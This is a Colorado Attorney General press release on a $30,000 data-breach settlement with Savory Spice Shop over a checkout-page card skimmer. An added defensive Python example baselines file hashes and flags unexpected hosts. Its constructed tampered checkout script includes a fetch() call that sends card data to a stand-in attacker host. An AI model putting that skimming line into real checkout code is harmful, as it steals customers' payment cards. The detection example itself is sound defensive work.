Attorney General Phil Weiser announces settlement in Savory Spice Shop data breach that impacted more than 13,000 Coloradans
July 22, 2022 (DENVER) – Attorney General Phil Weiser today announced a $30,000 data breach settlement with Savory Spice Shop, a company based in Denver that failed to safeguard the payment card information of 13,888 Colorado customers and waited months to notify them that their information had been compromised.
“When someone’s debit or credit card information is stolen, it can impact their savings, livelihood, and credit score, and cause significant stress as they work to secure their online identity and recover money that was stolen,” Weiser said. “With the continued rise in online shopping, it is critical that businesses secure their websites. We will continue to hold businesses accountable to following the law and protecting consumers’ information.”
Due in part to inadequate website security, Savory Spice was the victim of a data breach at an unknown time between April 2018 and September 2020 that allowed an attacker to skim customer payment card information from the website's checkout page. An unknown criminal altered a file on the server hosting the shop's website so that, at the same time it forwarded card information to Savory Spice's card processor, it also sent a copy of that information to a remote server controlled by the attacker.
In September 2020, when the payment card processor notified Savory Spice of the breach, the business found and deleted the malicious file on its server. However, the business failed to implement recommended security measures in time to thwart a second data breach, which occurred in March of 2021.
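As an added illustration, not code from Savory Spice, its card processor, or the Attorney General's office, the following Python script shows the check that would have caught the kind of change described above: a SHA-256 baseline of the website's deployed files, taken when the site is known to be good and rechecked later, plus a scan of every changed file for outbound hosts other than the card processor. The directory layout, the hostnames and the checkout script are constructed for the example, and the allowlist holds a single assumed processor host.

```python
"""File-integrity check for a web checkout, with a scan for unexpected
exfiltration hosts. Added example; it is not Savory Spice's code."""
import hashlib
import re
import tempfile
from pathlib import Path

# Constructed allowlist: the only host the checkout code may send card data to.
ALLOWED_HOSTS = {"payments.processor.example"}

# Captures the host part of any http(s) URL found in a file.
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


def sha256_file(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def build_baseline(root: Path) -> dict:
    """Map each file under root (POSIX relative path) to its SHA-256.
    Taken once at deploy time, when the files are known to be clean."""
    return {
        p.relative_to(root).as_posix(): sha256_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def diff_baseline(root: Path, baseline: dict) -> dict:
    """Re-hash the tree and report files whose content changed,
    files that appeared, and files that disappeared since the baseline."""
    current = build_baseline(root)
    return {
        "modified": sorted(f for f in baseline if f in current and current[f] != baseline[f]),
        "added": sorted(f for f in current if f not in baseline),
        "removed": sorted(f for f in baseline if f not in current),
    }


def unexpected_hosts(text: str, allowed=ALLOWED_HOSTS) -> set:
    """Hosts referenced by the file that are not on the allowlist."""
    return {h for h in URL_RE.findall(text) if h not in allowed}


# Constructed checkout script, as deployed and as tampered with.
CLEAN_CHECKOUT = """
async function submitCard(card) {
  await fetch("https://payments.processor.example/charge",
              {method: "POST", body: JSON.stringify(card)});
}
"""

SKIMMED_CHECKOUT = """
async function submitCard(card) {
  // injected: a copy of the card data also goes to an attacker-controlled host
  fetch("https://collect.attacker.example/c",
        {method: "POST", body: JSON.stringify(card)});
  await fetch("https://payments.processor.example/charge",
              {method: "POST", body: JSON.stringify(card)});
}
"""


def demo() -> dict:
    """Deploy a clean site, take the baseline, tamper with the checkout
    file, then run the check. Returns what the check reports."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "js").mkdir()
        (root / "js" / "checkout.js").write_text(CLEAN_CHECKOUT)
        (root / "index.html").write_text("<html><body>Checkout</body></html>")
        baseline = build_baseline(root)  # taken while the site is clean

        (root / "js" / "checkout.js").write_text(SKIMMED_CHECKOUT)  # the tampering

        changes = diff_baseline(root, baseline)
        hosts = {f: unexpected_hosts((root / f).read_text()) for f in changes["modified"]}
        return {"changes": changes, "unexpected_hosts": hosts}


if __name__ == "__main__":
    print(demo())
```

The baseline must live somewhere the attacker cannot rewrite (a separate host or read-only storage), and the recheck should run on a schedule rather than only after a processor complaint; a baseline stored beside the files it protects can be updated by the same intruder who changed them.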
Although its online policy promised notification within 30 days of a breach, Savory Spice did not notify the 13,888 customers who were impacted by both breaches until July 23, 2021, nine months after the company first learned of the breach.
In addition to the $30,000 payment to the state, Savory agreed to create and maintain an information security policy and an incident response plan, to meet the requirements of Colorado law and to help prevent such a breach from happening again.
The Colorado Attorney General enforces Colorado data protection and data breach laws, which require companies to maintain and follow appropriate policies and practices to protect consumer data. Meeting these requirements means inventorying the data a company collects and stores, developing a written information disposal policy, mitigating identified risks in the company's data collection and use practices, training employees on the company's security practices, and responding to data breaches that do occur. Depending on the nature of the company and the consumer data in its control, a company may need to develop a written information security policy and a written incident response plan.
Information about data protection requirements for businesses and government entities, and tips for impacted consumers, is available from the Colorado Attorney General's office.